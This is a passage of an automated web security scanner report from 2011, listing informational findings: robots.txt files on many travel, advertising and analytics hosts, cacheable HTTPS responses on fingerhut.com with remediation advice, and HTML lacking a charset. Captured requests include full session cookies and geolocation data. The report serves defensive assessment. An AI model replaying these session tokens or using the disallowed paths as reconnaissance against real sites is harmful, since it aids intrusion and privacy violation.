Accept-Ranges: bytes
Content-Length: 203
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow:
Sitemap: http://travel.travelocity.com/cruise_sitemap.xml
Sitemap: http://hotels.travelocity.com/sitemap.xml
Sitemap: http://hotels.travelocity.com/sitemapindexhoteldetails.xml
...[SNIP]...

27.65. http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://travel.usatoday.com
Path:	/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: travel.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 11 Apr 2011 15:05:52 GMT
Accept-Ranges: bytes
ETag: "ae247f359f8cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 16 May 2011 01:19:35 GMT
Connection: close
Content-Length: 92

# robots.txt for http://travel.usatoday.com
User-agent:*
Disallow:/preview
Disallow:/test

27.66. http://ts.istrack.com/trackingAPI.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ts.istrack.com
Path:	/trackingAPI.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ts.istrack.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:33:22 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 14:41:55 GMT
ETag: "3a774-1a-3ee172c0"
Accept-Ranges: bytes
Content-Length: 26
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /

27.67. http://turn.nexac.com/r/pu previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://turn.nexac.com
Path:	/r/pu

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: turn.nexac.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Mon, 16 May 2011 01:26:46 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

27.68. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s02545102506410 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usatoday1.112.2o7.net
Path:	/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s02545102506410

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:26:53 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "10a342-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www78
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.69. http://w88.go.com/b/ss/wdgwdprodcl,wdgwdprosec,wdgdsec/1/H.22.1/s07427038340829 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://w88.go.com
Path:	/b/ss/wdgwdprodcl,wdgwdprosec,wdgdsec/1/H.22.1/s07427038340829

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: w88.go.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:27:17 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "1bc16d-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www610
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.70. http://webassets.scea.com/pscomauth/groups/public/documents/webasset/psn_favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webassets.scea.com
Path:	/pscomauth/groups/public/documents/webasset/psn_favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: webassets.scea.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Date: Sun, 15 May 2011 20:27:01 GMT
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
ETag: "1ce4cd9-1a-48f6a58fb1d40"
Expires: Sun, 15 May 2011 14:50:00 GMT
Last-Modified: Sat, 04 Sep 2010 07:53:49 GMT
Accept-Ranges: bytes
Server: Level-3 Origin Storage/1.5
Connection: close

User-agent: *
Disallow: /

27.71. http://wow.weather.com/weather/wow/module/USNY0400 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wow.weather.com
Path:	/weather/wow/module/USNY0400

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wow.weather.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:19:52 GMT
Server: Apache
SVRNAME: web2x04
Last-Modified: Fri, 04 Jun 2010 15:15:07 GMT
Accept-Ranges: bytes
Content-Length: 305
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=7488
Connection: Keep-Alive
Content-Type: text/plain

# /robots.txt
User-agent: *
Disallow: /cgi-bin
Disallow: /fcgi-bin
Disallow: /interact/photogallery/results.html
Disallow: /interact/photogallery/details.html
Disallow: /RealMedia
Disallow: /search/pa
...[SNIP]...

27.72. http://www.bhphotovideo.com/bnh/controller/home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bhphotovideo.com
Path:	/bnh/controller/home

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bhphotovideo.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 09 Apr 2011 03:06:15 GMT
ETag: "491-4d9fcd27"
Cache-Control: no-cache
Date: Mon, 16 May 2011 01:41:44 GMT
Content-Length: 1169
Connection: close

User-agent: *
Disallow: /c/search*
Disallow: /search*
Disallow: /federal
Disallow: */edu
Disallow: /c/find/
Disallow: /impact/
Disallow: /find/organizational-sales.jsp*
Disallow: /find/gsa.jsp
Disallo
...[SNIP]...

27.73. http://www.cruisecritic.com/reviews/cruiseline.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cruisecritic.com
Path:	/reviews/cruiseline.cfm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cruisecritic.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 2896
Content-Type: text/plain
Content-Location: http://www.cruisecritic.com/robots.txt
Last-Modified: Mon, 01 Jun 2009 20:08:00 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:26:40 GMT
Connection: close

User-agent: *
Disallow: _utm.gif
Disallow: _utm.js
Disallow: 411.cfm
Disallow: adsetup.cfm
Disallow: application.cfm
Disallow: articlepopup.cfm
Disallow: articlepopup_imageload.cfm
Disallow: a
...[SNIP]...

27.74. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.54.99.28
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

27.75. http://www.google-analytics.com/__utm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google-analytics.com
Path:	/__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Sun, 15 May 2011 20:26:35 GMT
Expires: Sun, 15 May 2011 20:26:35 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

27.76. http://www.googleadservices.com/pagead/conversion/1034849195/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/conversion/1034849195/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 09 May 2011 20:53:07 GMT
Date: Sun, 15 May 2011 21:31:04 GMT
Expires: Sun, 15 May 2011 21:31:04 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.77. http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mcafeesecure.com
Path:	/us/forconsumers/mcafee_certified_sites.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mcafeesecure.com

Response

HTTP/1.0 200 OK
Server: McAfeeSecure
Cache-Control: private
ETag: "EKdW2Rg2Pnr"
Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
Content-Length: 44
Date: Mon, 16 May 2011 01:38:54 GMT

# Allow Everything
User-agent: *
Disallow:

27.78. https://www.mcafeesecure.com/RatingVerify previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.mcafeesecure.com
Path:	/RatingVerify

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mcafeesecure.com

Response

HTTP/1.0 200 OK
Server: McAfeeSecure
Cache-Control: private
ETag: "EKdW2Rg2Pnr"
Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
Content-Length: 44
Date: Mon, 16 May 2011 01:37:36 GMT

# Allow Everything
User-agent: *
Disallow:

27.79. http://www.mickeypath.com/id/1304751739.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mickeypath.com
Path:	/id/1304751739.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mickeypath.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:22:00 GMT
Server: Apache
Last-Modified: Sat, 19 Apr 2008 23:11:32 GMT
ETag: "80fb74-a7-44b41fcbc5100"
Accept-Ranges: bytes
Content-Length: 167
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /banners/
Disallow: /cache/
Disallow: /cgi/
Disallow: /db/
Disallow: /del/
Disallow: /images/
Disallow: /sliders/
Disallow: /stats/

27.80. http://www.orbitz.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.orbitz.com

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 06 May 2011 16:12:43 GMT
ETag: "23d-4a29dc27734c0"
Content-Type: text/plain
Content-Length: 573
Server: Apache
Date: Mon, 16 May 2011 01:29:50 GMT
Age: 359716
Connection: keep-alive
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

## Last updated March 24, 2010
User-agent: *
Disallow: /d.gif
Disallow: /global/
Disallow: /img/
Disallow: /partner/
Disallow: /creditcard/
Disallow: /event.ng/
Disallow: /html.ng/
Disallow: /js.ng/
D
...[SNIP]...

27.81. http://www.passporter.com/concierge/ticker/countdown17548-1026.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.passporter.com
Path:	/concierge/ticker/countdown17548-1026.png

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.passporter.com

Response

HTTP/1.1 200 OK
Content-Length: 24
Content-Type: text/plain
Last-Modified: Tue, 02 Jan 2007 01:16:24 GMT
Accept-Ranges: bytes
ETag: "e48cb19eb2ec71:32df"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:23:29 GMT
Connection: close

User-agent: *
Disallow:

27.82. http://www.passporterboards.com/forums/clientscript/vbulletin_important.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.passporterboards.com
Path:	/forums/clientscript/vbulletin_important.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.passporterboards.com

Response

HTTP/1.1 200 OK
Content-Length: 24
Content-Type: text/plain
Last-Modified: Tue, 02 Jan 2007 01:16:24 GMT
Accept-Ranges: bytes
ETag: "e48cb19eb2ec71:32df"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:19:55 GMT
Connection: close

User-agent: *
Disallow:

27.83. http://www.popularmedia.net/widget/2be74c3e1d1bba1022bc80b0b5e0e0a5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.popularmedia.net
Path:	/widget/2be74c3e1d1bba1022bc80b0b5e0e0a5

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.popularmedia.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:40:30 GMT
Server: Apache/2.2.9 (Unix)
Last-Modified: Fri, 13 May 2011 21:43:20 GMT
ETag: "712f5-c8-4a32f31bb6e00"
Accept-Ranges: bytes
Content-Length: 200
Cache-Control: no-cache, must-revalidate, max-age=0
Expires: Mon, 16 May 2011 01:40:30 GMT
Vary: Accept-Encoding
Pragma: no-cache
Connection: close
Content-Type: text/plain; charset=UTF-8

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
User-Agent: *
Disallow: /

27.84. http://www.siteadvisor.com/download/windows.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.siteadvisor.com
Path:	/download/windows.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.siteadvisor.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:39:28 GMT
Server: Apache
Last-Modified: Wed, 09 Jul 2008 02:03:21 GMT
ETag: "758185-167-4518db6812c40"
Accept-Ranges: bytes
Content-Length: 359
Connection: close
Content-Type: text/plain

User-agent: Googlebot
Disallow: /cgi-bin/

User-agent: Slurp
Disallow: /cgi-bin/

User-agent: Yahoo-NewsCrawler
Disallow: /cgi-bin/

User-agent: msnbot
Disallow: /cgi-bin/

User-agent: Teoma
Disallow:
...[SNIP]...

27.85. http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.telegraph.co.uk
Path:	/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.telegraph.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 10 May 2011 14:01:46 GMT
ETag: "6b1239-1ba-4a2ec65846719"
Content-Type: text/plain
Date: Mon, 16 May 2011 01:19:34 GMT
Content-Length: 442
Connection: close

# Robots.txt file
# All robots will spider the domain

User-agent: *

Disallow: */ixale/
Disallow: /core/Content/
Disallow: /*?source=rss
Disallow: /*?source=refresh
Disallow: /*?mobile=true
Disallow:
...[SNIP]...

27.86. http://www.viddler.com/file/7d63c65a/html5mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.viddler.com
Path:	/file/7d63c65a/html5mobile/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.viddler.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sun, 15 May 2011 20:26:40 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Mon, 11 Oct 2010 13:24:54 GMT
ETag: "106c1d6-23-492574927d580"
Accept-Ranges: bytes
Content-Length: 35
Vary: Accept-Encoding

User-Agent: *
Disallow: /search/?

28. Cacheable HTTPS response previous next
There are 7 instances of this issue:

https://www.fingerhut.com/fingerhut/assets/images/favicon.ico
https://www.fingerhut.com/fingerhut/css/sifr-config.jsp
https://www.fingerhut.com/js/financial-snapshot.jsp
https://www.fingerhut.com/js/persistent_cart.jsp
https://www.fingerhut.com/js/sifr.jsp
https://www.fingerhut.com/user/login.jsp
https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

28.1. https://www.fingerhut.com/fingerhut/assets/images/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.fingerhut.com
Path:	/fingerhut/assets/images/favicon.ico

Request

GET /fingerhut/assets/images/favicon.ico HTTP/1.1
Host: www.fingerhut.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PIPELINE_SESSION_ID=f669947d7f000001339214b19bb1da70; LOG_CAMPAIGN_TRACKING_471=62413836; __g_u=321574908789509_1_0.1_0_5_1305941208323; sifrFetch=true; isvtid_ets=1305509228072; s_vi=[CS]v1|26E83EB6051D105C-4000010840053157[CE]; utag_main=_st:1305511030631$ses_id:1305510088374%3Bexp-session; isvt_visitor=jd0hQQoBC2cAAEZ16P4AAAAAAAj565SmEjOKVW; __utmz=142754730.1305509233.1.1.utmcsr=ad.doubleclick.net|utmccn=(referral)|utmcmd=referral|utmcct=/adi/x1.rtb/fingerhut/doubledma/ron/ctest; __utma=142754730.883000967.1305509233.1305509233.1305509233.1; __utmb=142754730.1.10.1305509233; __utmc=142754730; IS3_GSV=DPL-2_TES-1305509228_PCT-1305509228_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com_GeoCc-NA_GeoCn-United%20States_GeoDa-623_GeoAc-214_GeoLa-32.782501_GeoLo-%252D96.820702_GeoIs-SoftLayer%20Technologies_GeoOr-Media%20Visions; IS3_History=1301114322-1-41_1--1+2--1+3--1+4--1+6--1+8--1+9--1+11--1+12--1+13--1+15--1+16--1+17--1__1-2-3-4-6-8-9-11-12-13-15-16-17_; bnTrail=%5B%22http%3A%2F%2Fwww.fingerhut.com%2Fuser%2Fstart_credit_app.jsp%3F%3D%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static%22%5D; USER_SESSION_VALIDATE_COOKIE=false; fsr.s={"v":1,"rid":"1305509244105_369994","ru":"http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest\u003bsz=728x90\u003bclick=http://bn.xp1.ru4.com/bclick?_f=8BWls1L7DgGK&_o=15607&_eo=747980&_et=1305508796&_a=1791737&_s=0&_d=1125798&_pm=747980&_pn=17918465&redirect=\u003bu=17918465\u003bord=6394684?","r":"ad.doubleclick.net","st":"","pv":1,"to":3,"c":"http://www.fingerhut.com/user/start_credit_app.jsp","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1,"f":1305509440687}; bn_u=6923549102649626308; __g_c=w%3A1%7Cb%3A4%7Cc%3A321574908789509%7Cd%3A1%7Ca%3A1%7Ce%3A0.1%7Cf%3A0%7Cr%3Ahttp%24*%24//www.fingerhut.com/section/Electronics/4.uts_2___1305509448582%7Cg%3A1; JSESSIONID=B2A6DA49F1BA07C809B5419FE36EBB6F; s_cc=true; s_sq=%5B%5BB%5D%5D; fsr.a=1305509501786; mbox=session#1305509219944-478846#1305511348|PC#1305509219944-478846.17#1308101488|check#true#1305509548|disable#browser%20timeout#1305513103

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 11 May 2011 13:33:48 GMT
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 1406
Date: Mon, 16 May 2011 01:37:31 GMT
Connection: keep-alive

..............h.......(....... ............................................W...d............|.............._..._...\ ......M...................p#..........W.......S...K....S..f...Q............w..Q...Q
...[SNIP]...

28.2. https://www.fingerhut.com/fingerhut/css/sifr-config.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.fingerhut.com
Path:	/fingerhut/css/sifr-config.jsp

Request

Response

28.3. https://www.fingerhut.com/js/financial-snapshot.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.fingerhut.com
Path:	/js/financial-snapshot.jsp

Request

GET /js/financial-snapshot.jsp HTTP/1.1
Host: www.fingerhut.com
Connection: keep-alive
Referer: https://www.fingerhut.com/user/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PIPELINE_SESSION_ID=f669947d7f000001339214b19bb1da70; LOG_CAMPAIGN_TRACKING_471=62413836; __g_u=321574908789509_1_0.1_0_5_1305941208323; sifrFetch=true; isvtid_ets=1305509228072; s_vi=[CS]v1|26E83EB6051D105C-4000010840053157[CE]; utag_main=_st:1305511030631$ses_id:1305510088374%3Bexp-session; isvt_visitor=jd0hQQoBC2cAAEZ16P4AAAAAAAj565SmEjOKVW; __utmz=142754730.1305509233.1.1.utmcsr=ad.doubleclick.net|utmccn=(referral)|utmcmd=referral|utmcct=/adi/x1.rtb/fingerhut/doubledma/ron/ctest; __utma=142754730.883000967.1305509233.1305509233.1305509233.1; __utmb=142754730.1.10.1305509233; __utmc=142754730; IS3_GSV=DPL-2_TES-1305509228_PCT-1305509228_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com_GeoCc-NA_GeoCn-United%20States_GeoDa-623_GeoAc-214_GeoLa-32.782501_GeoLo-%252D96.820702_GeoIs-SoftLayer%20Technologies_GeoOr-Media%20Visions; IS3_History=1301114322-1-41_1--1+2--1+3--1+4--1+6--1+8--1+9--1+11--1+12--1+13--1+15--1+16--1+17--1__1-2-3-4-6-8-9-11-12-13-15-16-17_; bnTrail=%5B%22http%3A%2F%2Fwww.fingerhut.com%2Fuser%2Fstart_credit_app.jsp%3F%3D%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static%22%5D; USER_SESSION_VALIDATE_COOKIE=false; fsr.s={"v":1,"rid":"1305509244105_369994","ru":"http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest\u003bsz=728x90\u003bclick=http://bn.xp1.ru4.com/bclick?_f=8BWls1L7DgGK&_o=15607&_eo=747980&_et=1305508796&_a=1791737&_s=0&_d=1125798&_pm=747980&_pn=17918465&redirect=\u003bu=17918465\u003bord=6394684?","r":"ad.doubleclick.net","st":"","pv":1,"to":3,"c":"http://www.fingerhut.com/user/start_credit_app.jsp","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1,"f":1305509440687}; mbox=session#1305509219944-478846#1305511302|PC#1305509219944-478846.17#1308101442|check#true#1305509502; bn_u=6923549102649626308; s_cc=true; s_sq=%5B%5BB%5D%5D; fsr.a=1305509461406; JSESSIONID=3C769805A330D33749C721314DA0795A; __g_c=w%3A1%7Cb%3A4%7Cc%3A321574908789509%7Cd%3A1%7Ca%3A1%7Ce%3A0.1%7Cf%3A0%7Cr%3Ahttp%24*%24//www.fingerhut.com/section/Electronics/4.uts_2___1305509448582%7Cg%3A1

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en
Cache-Control: max-age=3600
Expires: Mon, 16 May 2011 02:31:18 GMT
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 5659
Date: Mon, 16 May 2011 01:31:18 GMT
Connection: keep-alive

var financialSnapshot = function() {
   $(function() {
       financialSnapshot.init();
   });
   var _p = {

rColIndex : null,
       loadAsset : function() {
           if ( $( "#financialSnapshot" ).le
...[SNIP]...

28.4. https://www.fingerhut.com/js/persistent_cart.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.fingerhut.com
Path:	/js/persistent_cart.jsp

Request

Response

28.5. https://www.fingerhut.com/js/sifr.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.fingerhut.com
Path:	/js/sifr.jsp

Request

Response

28.6. https://www.fingerhut.com/user/login.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.fingerhut.com
Path:	/user/login.jsp

Request

Response

28.7. https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/StoreCatalogDisplay

Request

Response

29. HTML does not specify charset previous next
There are 24 instances of this issue:

http://a.tribalfusion.com/p.media/a3mOnI36QY5s7eUsBlWGMhRPnNTtMSWrb13rIoWEjpTaFaPaYFRVjZaQUaoRt7bUGjU4UmxmHyMXamx4dMFPGjZd5AULmW6yVHjhYUf9XFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r3aUHfSmmMCpVMtmHfolxCrdP/2020316/frame.html
http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28
http://ad.doubleclick.net/adi/N4764.cruisecritic/B3091233
http://ad.doubleclick.net/adi/N4975.1207.TRAVELOCITY.COM/B5393428.18
http://ad.doubleclick.net/adi/N5823.DbclkAdEx/B5478635.45
http://ad.doubleclick.net/adi/ta.cc.com.s/deals
http://ad.doubleclick.net/adi/ta.cc.com.s/disney
http://ad.doubleclick.net/adi/x1.dt/dt
http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest
http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs
http://cdn5.tribalfusion.com/media/1956006/frame.html
http://content.usatoday.com/asp/uas3/uasSignedOut.htm
http://content.usatoday.com/asp/usataj/usatajhost.htm
http://d.xp1.ru4.com/um
http://ds.addthis.com/red/psi/sites/travel.usatoday.com/p.json
http://f.nexac.com/e/a-677/s-2140.xgi
http://fls.doubleclick.net/activityi
http://https.edge.ru4.com/smartserve/ad
http://odb.outbrain.com/utils/ping.html
http://ping.chartbeat.net/ping
http://pixel.invitemedia.com/data_sync
http://serv.adspeed.com/ad.php
http://wow.weather.com/weather/wow/module/USNY0400
http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/a3mOnI36QY5s7eUsBlWGMhRPnNTtMSWrb13rIoWEjpTaFaPaYFRVjZaQUaoRt7bUGjU4UmxmHyMXamx4dMFPGjZd5AULmW6yVHjhYUf9XFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r3aUHfSmmMCpVMtmHfolxCrdP/2020316/frame.html

Request

GET /p.media/a3mOnI36QY5s7eUsBlWGMhRPnNTtMSWrb13rIoWEjpTaFaPaYFRVjZaQUaoRt7bUGjU4UmxmHyMXamx4dMFPGjZd5AULmW6yVHjhYUf9XFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r3aUHfSmmMCpVMtmHfolxCrdP/2020316/frame.html HTTP/1.1
